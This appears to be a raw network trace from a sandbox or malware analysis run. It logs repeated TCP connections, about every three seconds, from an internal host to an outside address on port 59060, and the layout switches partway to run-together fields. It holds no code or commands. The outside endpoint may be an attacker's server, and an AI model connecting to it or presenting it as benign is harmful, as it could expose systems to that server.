Dec 26, 2024 19:28:51.077346087 CET | 59060 | 49753 | 152.42.226.16 | 192.168.2.4
Dec 26, 2024 19:28:51.077523947 CET | 49753 | 59060 | 192.168.2.4 | 152.42.226.16
Dec 26, 2024 19:28:51.077616930 CET | 49753 | 59060 | 192.168.2.4 | 152.42.226.16
Dec 26, 2024 19:28:51.195455074 CET | 49754 | 59060 | 192.168.2.4 | 152.42.226.16
Dec 26, 2024 19:28:51.197217941 CET | 59060 | 49753 | 152.42.226.16 | 192.168.2.4
Dec 26, 2024 19:28:51.315269947 CET | 59060 | 49754 | 152.42.226.16 | 192.168.2.4
Dec 26, 2024 19:28:51.315527916 CET | 49754 | 59060 | 192.168.2.4 | 152.42.226.16
Dec 26, 2024 19:28:51.315757036 CET | 49754 | 59060 | 192.168.2.4 | 152.42.226.16
Dec 26, 2024 19:28:51.435231924 CET | 59060 | 49754 | 152.42.226.16 | 192.168.2.4
Dec 26, 2024 19:28:53.995269060 CET | 59060 | 49754 | 152.42.226.16 | 192.168.2.4
Dec 26, 2024 19:28:53.995484114 CET | 49754 | 59060 | 192.168.2.4 | 152.42.226.16
Dec 26, 2024 19:28:53.995588064 CET | 49754 | 59060 | 192.168.2.4 | 152.42.226.16
Dec 26, 2024 19:28:54.097229004 CET | 49755 | 59060 | 192.168.2.4 | 152.42.226.16
Dec 26, 2024 19:28:54.115704060 CET | 59060 | 49754 | 152.42.226.16 | 192.168.2.4
Dec 26, 2024 19:28:54.217515945 CET | 59060 | 49755 | 152.42.226.16 | 192.168.2.4
Dec 26, 2024 19:28:54.217698097 CET | 49755 | 59060 | 192.168.2.4 | 152.42.226.16
Dec 26, 2024 19:28:54.218161106 CET | 49755 | 59060 | 192.168.2.4 | 152.42.226.16
Dec 26, 2024 19:28:54.337990999 CET | 59060 | 49755 | 152.42.226.16 | 192.168.2.4
Dec 26, 2024 19:28:56.948162079 CET | 59060 | 49755 | 152.42.226.16 | 192.168.2.4
Dec 26, 2024 19:28:56.948292017 CET | 49755 | 59060 | 192.168.2.4 | 152.42.226.16
Dec 26, 2024 19:28:56.979860067 CET | 49755 | 59060 | 192.168.2.4 | 152.42.226.16
Dec 26, 2024 19:28:57.084100962 CET | 49758 | 59060 | 192.168.2.4 | 152.42.226.16
Dec 26, 2024 19:28:57.099351883 CET | 59060 | 49755 | 152.42.226.16 | 192.168.2.4
Dec 26, 2024 19:28:57.203691959 CET | 59060 | 49758 | 152.42.226.16 | 192.168.2.4
Dec 26, 2024 19:28:57.203768015 CET | 49758 | 59060 | 192.168.2.4 | 152.42.226.16
Dec 26, 2024 19:28:57.203973055 CET | 49758 | 59060 | 192.168.2.4 | 152.42.226.16
Dec 26, 2024 19:28:57.323568106 CET | 59060 | 49758 | 152.42.226.16 | 192.168.2.4
Dec 26, 2024 19:28:59.893759012 CET | 59060 | 49758 | 152.42.226.16 | 192.168.2.4
Dec 26, 2024 19:28:59.893821001 CET | 49758 | 59060 | 192.168.2.4 | 152.42.226.16
Dec 26, 2024 19:28:59.893956900 CET | 49758 | 59060 | 192.168.2.4 | 152.42.226.16
Dec 26, 2024 19:29:00.004810095 CET | 49764 | 59060 | 192.168.2.4 | 152.42.226.16
Dec 26, 2024 19:29:00.018047094 CET | 59060 | 49758 | 152.42.226.16 | 192.168.2.4
Dec 26, 2024 19:29:00.131144047 CET | 59060 | 49764 | 152.42.226.16 | 192.168.2.4
Dec 26, 2024 19:29:00.131216049 CET | 49764 | 59060 | 192.168.2.4 | 152.42.226.16
Dec 26, 2024 19:29:00.131360054 CET | 49764 | 59060 | 192.168.2.4 | 152.42.226.16
Dec 26, 2024 19:29:00.250821114 CET | 59060 | 49764 | 152.42.226.16 | 192.168.2.4
Dec 26, 2024 19:29:02.784812927 CET | 59060 | 49764 | 152.42.226.16 | 192.168.2.4
Dec 26, 2024 19:29:02.785027981 CET | 49764 | 59060 | 192.168.2.4 | 152.42.226.16
Dec 26, 2024 19:29:02.785027981 CET | 49764 | 59060 | 192.168.2.4 | 152.42.226.16
Dec 26, 2024 19:29:02.894084930 CET | 49770 | 59060 | 192.168.2.4 | 152.42.226.16
Dec 26, 2024 19:29:02.906250954 CET | 59060 | 49764 | 152.42.226.16 | 192.168.2.4
Dec 26, 2024 19:29:03.033308983 CET | 59060 | 49770 | 152.42.226.16 | 192.168.2.4
Dec 26, 2024 19:29:03.033422947 CET | 49770 | 59060 | 192.168.2.4 | 152.42.226.16
Dec 26, 2024 19:29:03.033688068 CET | 49770 | 59060 | 192.168.2.4 | 152.42.226.16
Dec 26, 2024 19:29:03.214739084 CET | 59060 | 49770 | 152.42.226.16 | 192.168.2.4
Dec 26, 2024 19:29:05.752500057 CET | 59060 | 49770 | 152.42.226.16 | 192.168.2.4
Dec 26, 2024 19:29:05.752619028 CET | 49770 | 59060 | 192.168.2.4 | 152.42.226.16
Dec 26, 2024 19:29:05.752715111 CET | 49770 | 59060 | 192.168.2.4 | 152.42.226.16
Dec 26, 2024 19:29:05.864645958 CET | 49776 | 59060 | 192.168.2.4 | 152.42.226.16
Dec 26, 2024 19:29:05.872536898 CET | 59060 | 49770 | 152.42.226.16 | 192.168.2.4
Dec 26, 2024 19:29:05.984224081 CET | 59060 | 49776 | 152.42.226.16 | 192.168.2.4
Dec 26, 2024 19:29:05.984334946 CET | 49776 | 59060 | 192.168.2.4 | 152.42.226.16
Dec 26, 2024 19:29:05.984513998 CET | 49776 | 59060 | 192.168.2.4 | 152.42.226.16
Dec 26, 2024 19:29:06.106645107 CET | 59060 | 49776 | 152.42.226.16 | 192.168.2.4
Dec 26, 2024 19:29:08.643415928 CET | 59060 | 49776 | 152.42.226.16 | 192.168.2.4
Dec 26, 2024 19:29:08.643491983 CET | 49776 | 59060 | 192.168.2.4 | 152.42.226.16
Dec 26, 2024 19:29:08.646202087 CET | 49776 | 59060 | 192.168.2.4 | 152.42.226.16
Dec 26, 2024 19:29:08.755592108 CET | 49782 | 59060 | 192.168.2.4 | 152.42.226.16
Dec 26, 2024 19:29:08.769798994 CET | 59060 | 49776 | 152.42.226.16 | 192.168.2.4
Dec 26, 2024 19:29:08.875336885 CET | 59060 | 49782 | 152.42.226.16 | 192.168.2.4
Dec 26, 2024 19:29:08.875538111 CET | 49782 | 59060 | 192.168.2.4 | 152.42.226.16
Dec 26, 2024 19:29:08.875693083 CET | 49782 | 59060 | 192.168.2.4 | 152.42.226.16
Dec 26, 2024 19:29:08.995280981 CET | 59060 | 49782 | 152.42.226.16 | 192.168.2.4
Dec 26, 2024 19:29:11.533996105 CET | 59060 | 49782 | 152.42.226.16 | 192.168.2.4
Dec 26, 2024 19:29:11.534105062 CET | 49782 | 59060 | 192.168.2.4 | 152.42.226.16
Dec 26, 2024 19:29:11.535875082 CET | 49782 | 59060 | 192.168.2.4 | 152.42.226.16
Dec 26, 2024 19:29:11.646469116 CET | 49788 | 59060 | 192.168.2.4 | 152.42.226.16
Dec 26, 2024 19:29:11.657885075 CET | 59060 | 49782 | 152.42.226.16 | 192.168.2.4
Dec 26, 2024 19:29:11.766161919 CET | 59060 | 49788 | 152.42.226.16 | 192.168.2.4
Dec 26, 2024 19:29:11.766273975 CET | 49788 | 59060 | 192.168.2.4 | 152.42.226.16
Dec 26, 2024 19:29:11.766458035 CET | 49788 | 59060 | 192.168.2.4 | 152.42.226.16
Dec 26, 2024 19:29:11.886267900 CET | 59060 | 49788 | 152.42.226.16 | 192.168.2.4
Dec 26, 2024 19:29:14.424277067 CET | 59060 | 49788 | 152.42.226.16 | 192.168.2.4
Dec 26, 2024 19:29:14.424352884 CET | 49788 | 59060 | 192.168.2.4 | 152.42.226.16
Dec 26, 2024 19:29:14.424458027 CET | 49788 | 59060 | 192.168.2.4 | 152.42.226.16
Dec 26, 2024 19:29:14.534986019 CET | 49794 | 59060 | 192.168.2.4 | 152.42.226.16
Dec 26, 2024 19:29:14.544081926 CET | 59060 | 49788 | 152.42.226.16 | 192.168.2.4
Dec 26, 2024 19:29:14.654622078 CET | 59060 | 49794 | 152.42.226.16 | 192.168.2.4
Dec 26, 2024 19:29:14.654738903 CET | 49794 | 59060 | 192.168.2.4 | 152.42.226.16
Dec 26, 2024 19:29:14.654863119 CET | 49794 | 59060 | 192.168.2.4 | 152.42.226.16
Dec 26, 2024 19:29:14.774420977 CET | 59060 | 49794 | 152.42.226.16 | 192.168.2.4
Dec 26, 2024 19:29:17.315108061 CET | 59060 | 49794 | 152.42.226.16 | 192.168.2.4
Dec 26, 2024 19:29:17.315336943 CET | 49794 | 59060 | 192.168.2.4 | 152.42.226.16
Dec 26, 2024 19:29:17.315431118 CET | 49794 | 59060 | 192.168.2.4 | 152.42.226.16
Dec 26, 2024 19:29:17.427928925 CET | 49805 | 59060 | 192.168.2.4 | 152.42.226.16
Dec 26, 2024 19:29:17.435002089 CET | 59060 | 49794 | 152.42.226.16 | 192.168.2.4
Dec 26, 2024 19:29:17.547877073 CET | 59060 | 49805 | 152.42.226.16 | 192.168.2.4
Dec 26, 2024 19:29:17.547954082 CET | 49805 | 59060 | 192.168.2.4 | 152.42.226.16
Dec 26, 2024 19:29:17.548139095 CET | 49805 | 59060 | 192.168.2.4 | 152.42.226.16
Dec 26, 2024 19:29:17.667715073 CET | 59060 | 49805 | 152.42.226.16 | 192.168.2.4
Dec 26, 2024 19:29:20.206419945 CET | 59060 | 49805 | 152.42.226.16 | 192.168.2.4
Dec 26, 2024 19:29:20.206541061 CET | 49805 | 59060 | 192.168.2.4 | 152.42.226.16
Dec 26, 2024 19:29:20.206563950 CET | 49805 | 59060 | 192.168.2.4 | 152.42.226.16
Dec 26, 2024 19:29:20.325421095 CET | 49811 | 59060 | 192.168.2.4 | 152.42.226.16
Dec 26, 2024 19:29:20.326260090 CET | 59060 | 49805 | 152.42.226.16 | 192.168.2.4
Dec 26, 2024 19:29:20.445081949 CET | 59060 | 49811 | 152.42.226.16 | 192.168.2.4
Dec 26, 2024 19:29:20.445197105 CET | 49811 | 59060 | 192.168.2.4 | 152.42.226.16
Dec 26, 2024 19:29:20.445466042 CET | 49811 | 59060 | 192.168.2.4 | 152.42.226.16
Dec 26, 2024 19:29:20.571774960 CET | 59060 | 49811 | 152.42.226.16 | 192.168.2.4
Dec 26, 2024 19:29:23.112092972 CET | 59060 | 49811 | 152.42.226.16 | 192.168.2.4
Dec 26, 2024 19:29:23.112154007 CET | 49811 | 59060 | 192.168.2.4 | 152.42.226.16
Dec 26, 2024 19:29:23.112220049 CET | 49811 | 59060 | 192.168.2.4 | 152.42.226.16
Dec 26, 2024 19:29:23.225373030 CET | 49817 | 59060 | 192.168.2.4 | 152.42.226.16
Dec 26, 2024 19:29:23.231843948 CET | 59060 | 49811 | 152.42.226.16 | 192.168.2.4
Dec 26, 2024 19:29:23.509383917 CET | 59060 | 49817 | 152.42.226.16 | 192.168.2.4
Dec 26, 2024 19:29:23.509493113 CET | 49817 | 59060 | 192.168.2.4 | 152.42.226.16
Dec 26, 2024 19:29:23.509773970 CET | 49817 | 59060 | 192.168.2.4 | 152.42.226.16
Dec 26, 2024 19:29:23.629334927 CET | 59060 | 49817 | 152.42.226.16 | 192.168.2.4
Dec 26, 2024 19:29:26.230084896 CET | 59060 | 49817 | 152.42.226.16 | 192.168.2.4
Dec 26, 2024 19:29:26.230192900 CET | 49817 | 59060 | 192.168.2.4 | 152.42.226.16
Dec 26, 2024 19:29:26.230300903 CET | 49817 | 59060 | 192.168.2.4 | 152.42.226.16
Dec 26, 2024 19:29:26.333434105 CET | 49823 | 59060 | 192.168.2.4 | 152.42.226.16
Dec 26, 2024 19:29:26.349837065 CET | 59060 | 49817 | 152.42.226.16 | 192.168.2.4
Dec 26, 2024 19:29:26.454288006 CET | 59060 | 49823 | 152.42.226.16 | 192.168.2.4
Dec 26, 2024 19:29:26.454466105 CET | 49823 | 59060 | 192.168.2.4 | 152.42.226.16
Dec 26, 2024 19:29:26.454684973 CET | 49823 | 59060 | 192.168.2.4 | 152.42.226.16
Dec 26, 2024 19:29:26.574361086 CET | 59060 | 49823 | 152.42.226.16 | 192.168.2.4
Dec 26, 2024 19:29:29.189400911 CET | 59060 | 49823 | 152.42.226.16 | 192.168.2.4
Dec 26, 2024 19:29:29.189460039 CET | 49823 | 59060 | 192.168.2.4 | 152.42.226.16
Dec 26, 2024 19:29:29.189522982 CET | 49823 | 59060 | 192.168.2.4 | 152.42.226.16
Dec 26, 2024 19:29:29.302544117 CET | 49829 | 59060 | 192.168.2.4 | 152.42.226.16
Dec 26, 2024 19:29:29.309094906 CET | 59060 | 49823 | 152.42.226.16 | 192.168.2.4
Dec 26, 2024 19:29:29.422203064 CET | 59060 | 49829 | 152.42.226.16 | 192.168.2.4
Dec 26, 2024 19:29:29.422276020 CET | 49829 | 59060 | 192.168.2.4 | 152.42.226.16
Dec 26, 2024 19:29:29.422482967 CET | 49829 | 59060 | 192.168.2.4 | 152.42.226.16
Dec 26, 2024 19:29:29.545082092 CET | 59060 | 49829 | 152.42.226.16 | 192.168.2.4
Dec 26, 2024 19:29:32.103863001 CET | 59060 | 49829 | 152.42.226.16 | 192.168.2.4
Dec 26, 2024 19:29:32.105460882 CET | 49829 | 59060 | 192.168.2.4 | 152.42.226.16
Dec 26, 2024 19:29:32.105462074 CET | 49829 | 59060 | 192.168.2.4 | 152.42.226.16
Dec 26, 2024 19:29:32.209331036 CET | 49839 | 59060 | 192.168.2.4 | 152.42.226.16
Dec 26, 2024 19:29:32.225203037 CET | 59060 | 49829 | 152.42.226.16 | 192.168.2.4
Dec 26, 2024 19:29:32.328928947 CET | 59060 | 49839 | 152.42.226.16 | 192.168.2.4
Dec 26, 2024 19:29:32.329576015 CET | 49839 | 59060 | 192.168.2.4 | 152.42.226.16
Dec 26, 2024 19:29:32.329576015 CET | 49839 | 59060 | 192.168.2.4 | 152.42.226.16
Dec 26, 2024 19:29:32.450042009 CET | 59060 | 49839 | 152.42.226.16 | 192.168.2.4
Dec 26, 2024 19:29:35.046013117 CET | 59060 | 49839 | 152.42.226.16 | 192.168.2.4
Dec 26, 2024 19:29:35.046125889 CET | 49839 | 59060 | 192.168.2.4 | 152.42.226.16
Dec 26, 2024 19:29:35.046247959 CET | 49839 | 59060 | 192.168.2.4 | 152.42.226.16
Dec 26, 2024 19:29:35.162214994 CET | 49846 | 59060 | 192.168.2.4 | 152.42.226.16
Dec 26, 2024 19:29:35.165822983 CET | 59060 | 49839 | 152.42.226.16 | 192.168.2.4
Dec 26, 2024 19:29:35.281780958 CET | 59060 | 49846 | 152.42.226.16 | 192.168.2.4
Dec 26, 2024 19:29:35.281923056 CET | 49846 | 59060 | 192.168.2.4 | 152.42.226.16
Dec 26, 2024 19:29:35.282052994 CET | 49846 | 59060 | 192.168.2.4 | 152.42.226.16
Dec 26, 2024 19:29:35.401596069 CET | 59060 | 49846 | 152.42.226.16 | 192.168.2.4
Dec 26, 2024 19:29:37.940637112 CET | 59060 | 49846 | 152.42.226.16 | 192.168.2.4
                          Dec 26, 2024 19:29:37.940700054 CET4984659060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:29:37.940817118 CET4984659060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:29:38.053219080 CET4985259060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:29:38.062377930 CET5906049846152.42.226.16192.168.2.4
                          Dec 26, 2024 19:29:38.172900915 CET5906049852152.42.226.16192.168.2.4
                          Dec 26, 2024 19:29:38.173069000 CET4985259060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:29:38.175260067 CET4985259060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:29:38.295310974 CET5906049852152.42.226.16192.168.2.4
                          Dec 26, 2024 19:29:40.831753969 CET5906049852152.42.226.16192.168.2.4
                          Dec 26, 2024 19:29:40.833436966 CET4985259060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:29:40.833533049 CET4985259060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:29:40.949373960 CET4985859060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:29:40.953280926 CET5906049852152.42.226.16192.168.2.4
                          Dec 26, 2024 19:29:41.070861101 CET5906049858152.42.226.16192.168.2.4
                          Dec 26, 2024 19:29:41.073452950 CET4985859060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:29:41.077363968 CET4985859060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:29:41.197103977 CET5906049858152.42.226.16192.168.2.4
                          Dec 26, 2024 19:29:43.731386900 CET5906049858152.42.226.16192.168.2.4
                          Dec 26, 2024 19:29:43.731451035 CET4985859060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:29:43.731550932 CET4985859060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:29:43.850842953 CET4986959060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:29:43.854172945 CET5906049858152.42.226.16192.168.2.4
                          Dec 26, 2024 19:29:43.975255013 CET5906049869152.42.226.16192.168.2.4
                          Dec 26, 2024 19:29:43.975339890 CET4986959060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:29:43.975519896 CET4986959060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:29:44.095278025 CET5906049869152.42.226.16192.168.2.4
                          Dec 26, 2024 19:29:46.671401978 CET5906049869152.42.226.16192.168.2.4
                          Dec 26, 2024 19:29:46.671468973 CET4986959060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:29:46.671612978 CET4986959060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:29:46.789351940 CET4987559060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:29:46.791106939 CET5906049869152.42.226.16192.168.2.4
                          Dec 26, 2024 19:29:46.910106897 CET5906049875152.42.226.16192.168.2.4
                          Dec 26, 2024 19:29:46.910197973 CET4987559060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:29:46.910454988 CET4987559060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:29:47.030015945 CET5906049875152.42.226.16192.168.2.4
                          Dec 26, 2024 19:29:49.565959930 CET5906049875152.42.226.16192.168.2.4
                          Dec 26, 2024 19:29:49.566009998 CET4987559060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:29:49.566128016 CET4987559060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:29:49.678575993 CET4988159060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:29:49.689160109 CET5906049875152.42.226.16192.168.2.4
                          Dec 26, 2024 19:29:49.798221111 CET5906049881152.42.226.16192.168.2.4
                          Dec 26, 2024 19:29:49.798290968 CET4988159060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:29:49.798528910 CET4988159060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:29:49.923557043 CET5906049881152.42.226.16192.168.2.4
                          Dec 26, 2024 19:29:52.473210096 CET5906049881152.42.226.16192.168.2.4
                          Dec 26, 2024 19:29:52.473411083 CET4988159060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:29:52.473582029 CET4988159060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:29:52.585360050 CET4988759060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:29:52.593095064 CET5906049881152.42.226.16192.168.2.4
                          Dec 26, 2024 19:29:52.705117941 CET5906049887152.42.226.16192.168.2.4
                          Dec 26, 2024 19:29:52.705255032 CET4988759060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:29:52.706290007 CET4988759060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:29:52.825978041 CET5906049887152.42.226.16192.168.2.4
                          Dec 26, 2024 19:29:55.539190054 CET5906049887152.42.226.16192.168.2.4
                          Dec 26, 2024 19:29:55.539263010 CET4988759060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:29:55.540455103 CET4988759060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:29:55.646775961 CET4989659060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:29:55.661164045 CET5906049887152.42.226.16192.168.2.4
                          Dec 26, 2024 19:29:55.766330004 CET5906049896152.42.226.16192.168.2.4
                          Dec 26, 2024 19:29:55.766413927 CET4989659060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:29:55.766638041 CET4989659060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:29:55.888631105 CET5906049896152.42.226.16192.168.2.4
                          Dec 26, 2024 19:29:58.426526070 CET5906049896152.42.226.16192.168.2.4
                          Dec 26, 2024 19:29:58.426728964 CET4989659060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:29:58.426814079 CET4989659060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:29:58.536645889 CET4990459060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:29:58.546593904 CET5906049896152.42.226.16192.168.2.4
                          Dec 26, 2024 19:29:58.656606913 CET5906049904152.42.226.16192.168.2.4
                          Dec 26, 2024 19:29:58.656872988 CET4990459060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:29:58.656970024 CET4990459060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:29:58.776513100 CET5906049904152.42.226.16192.168.2.4
                          Dec 26, 2024 19:30:01.355679989 CET5906049904152.42.226.16192.168.2.4
                          Dec 26, 2024 19:30:01.355750084 CET4990459060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:01.355839968 CET4990459060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:01.458798885 CET4991059060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:01.475378990 CET5906049904152.42.226.16192.168.2.4
                          Dec 26, 2024 19:30:01.580722094 CET5906049910152.42.226.16192.168.2.4
                          Dec 26, 2024 19:30:01.580812931 CET4991059060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:01.581043959 CET4991059060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:01.700673103 CET5906049910152.42.226.16192.168.2.4
                          Dec 26, 2024 19:30:04.261286020 CET5906049910152.42.226.16192.168.2.4
                          Dec 26, 2024 19:30:04.261831045 CET4991059060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:04.261929035 CET4991059060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:04.365428925 CET4991659060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:04.381567955 CET5906049910152.42.226.16192.168.2.4
                          Dec 26, 2024 19:30:04.485116959 CET5906049916152.42.226.16192.168.2.4
                          Dec 26, 2024 19:30:04.487509966 CET4991659060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:04.487708092 CET4991659060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:04.607249975 CET5906049916152.42.226.16192.168.2.4
                          Dec 26, 2024 19:30:07.143734932 CET5906049916152.42.226.16192.168.2.4
                          Dec 26, 2024 19:30:07.144331932 CET4991659060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:07.144526958 CET4991659060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:07.255527020 CET4992559060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:07.263931036 CET5906049916152.42.226.16192.168.2.4
                          Dec 26, 2024 19:30:07.375387907 CET5906049925152.42.226.16192.168.2.4
                          Dec 26, 2024 19:30:07.375474930 CET4992559060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:07.375737906 CET4992559060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:07.495448112 CET5906049925152.42.226.16192.168.2.4
                          Dec 26, 2024 19:30:10.036117077 CET5906049925152.42.226.16192.168.2.4
                          Dec 26, 2024 19:30:10.036173105 CET4992559060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:10.036263943 CET4992559060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:10.146622896 CET4993359060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:10.159163952 CET5906049925152.42.226.16192.168.2.4
                          Dec 26, 2024 19:30:10.267723083 CET5906049933152.42.226.16192.168.2.4
                          Dec 26, 2024 19:30:10.268042088 CET4993359060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:10.273402929 CET4993359060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:10.395725965 CET5906049933152.42.226.16192.168.2.4
                          Dec 26, 2024 19:30:12.924824953 CET5906049933152.42.226.16192.168.2.4
                          Dec 26, 2024 19:30:12.925060034 CET4993359060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:12.925060034 CET4993359060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:13.037429094 CET4993959060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:13.044684887 CET5906049933152.42.226.16192.168.2.4
                          Dec 26, 2024 19:30:13.159260035 CET5906049939152.42.226.16192.168.2.4
                          Dec 26, 2024 19:30:13.159411907 CET4993959060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:13.159877062 CET4993959060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:13.486232996 CET5906049939152.42.226.16192.168.2.4
                          Dec 26, 2024 19:30:16.035536051 CET5906049939152.42.226.16192.168.2.4
                          Dec 26, 2024 19:30:16.035599947 CET4993959060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:16.035732985 CET4993959060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:16.147144079 CET4994559060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:16.155189991 CET5906049939152.42.226.16192.168.2.4
                          Dec 26, 2024 19:30:16.266839981 CET5906049945152.42.226.16192.168.2.4
                          Dec 26, 2024 19:30:16.268884897 CET4994559060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:16.272543907 CET4994559060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:16.392177105 CET5906049945152.42.226.16192.168.2.4
                          Dec 26, 2024 19:30:18.925544024 CET5906049945152.42.226.16192.168.2.4
                          Dec 26, 2024 19:30:18.931746960 CET4994559060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:18.932109118 CET4994559060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:19.037403107 CET4995459060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:19.051522970 CET5906049945152.42.226.16192.168.2.4
                          Dec 26, 2024 19:30:19.157145977 CET5906049954152.42.226.16192.168.2.4
                          Dec 26, 2024 19:30:19.157583952 CET4995459060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:19.157583952 CET4995459060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:19.277087927 CET5906049954152.42.226.16192.168.2.4
                          Dec 26, 2024 19:30:21.832463980 CET5906049954152.42.226.16192.168.2.4
                          Dec 26, 2024 19:30:21.832539082 CET4995459060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:21.832581997 CET4995459060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:21.944772959 CET4996259060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:21.952322960 CET5906049954152.42.226.16192.168.2.4
                          Dec 26, 2024 19:30:22.064637899 CET5906049962152.42.226.16192.168.2.4
                          Dec 26, 2024 19:30:22.064740896 CET4996259060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:22.064928055 CET4996259060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:22.185148001 CET5906049962152.42.226.16192.168.2.4
                          Dec 26, 2024 19:30:24.723762035 CET5906049962152.42.226.16192.168.2.4
                          Dec 26, 2024 19:30:24.725469112 CET4996259060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:24.725579023 CET4996259060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:24.833586931 CET4996859060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:24.845232964 CET5906049962152.42.226.16192.168.2.4
                          Dec 26, 2024 19:30:24.953109980 CET5906049968152.42.226.16192.168.2.4
                          Dec 26, 2024 19:30:24.955570936 CET4996859060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:24.961429119 CET4996859060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:25.081486940 CET5906049968152.42.226.16192.168.2.4
                          Dec 26, 2024 19:30:27.613040924 CET5906049968152.42.226.16192.168.2.4
                          Dec 26, 2024 19:30:27.613095045 CET4996859060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:27.613149881 CET4996859060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:27.725446939 CET4997359060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:27.732889891 CET5906049968152.42.226.16192.168.2.4
                          Dec 26, 2024 19:30:27.845037937 CET5906049973152.42.226.16192.168.2.4
                          Dec 26, 2024 19:30:27.845117092 CET4997359060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:27.845325947 CET4997359060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:27.966254950 CET5906049973152.42.226.16192.168.2.4
                          Dec 26, 2024 19:30:30.503401995 CET5906049973152.42.226.16192.168.2.4
                          Dec 26, 2024 19:30:30.503530979 CET4997359060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:30.503642082 CET4997359060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:30.623066902 CET5906049973152.42.226.16192.168.2.4
                          Dec 26, 2024 19:30:30.624186039 CET4997859060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:30.743916988 CET5906049978152.42.226.16192.168.2.4
                          Dec 26, 2024 19:30:30.744081974 CET4997859060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:30.744345903 CET4997859060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:30.864121914 CET5906049978152.42.226.16192.168.2.4
                          Dec 26, 2024 19:30:33.410553932 CET5906049978152.42.226.16192.168.2.4
                          Dec 26, 2024 19:30:33.410619974 CET4997859060192.168.2.4152.42.226.16
                          Dec 26, 2024 19:30:33.410713911 CET4997859060192.168.2.4152.42.226.16
